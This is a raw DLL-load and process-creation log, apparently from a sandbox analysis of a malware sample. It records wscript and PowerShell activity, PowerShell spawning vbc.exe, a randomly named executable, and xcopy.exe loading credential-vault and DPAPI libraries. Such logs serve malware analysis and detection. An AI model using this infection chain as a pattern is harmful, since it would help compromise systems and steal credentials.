Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
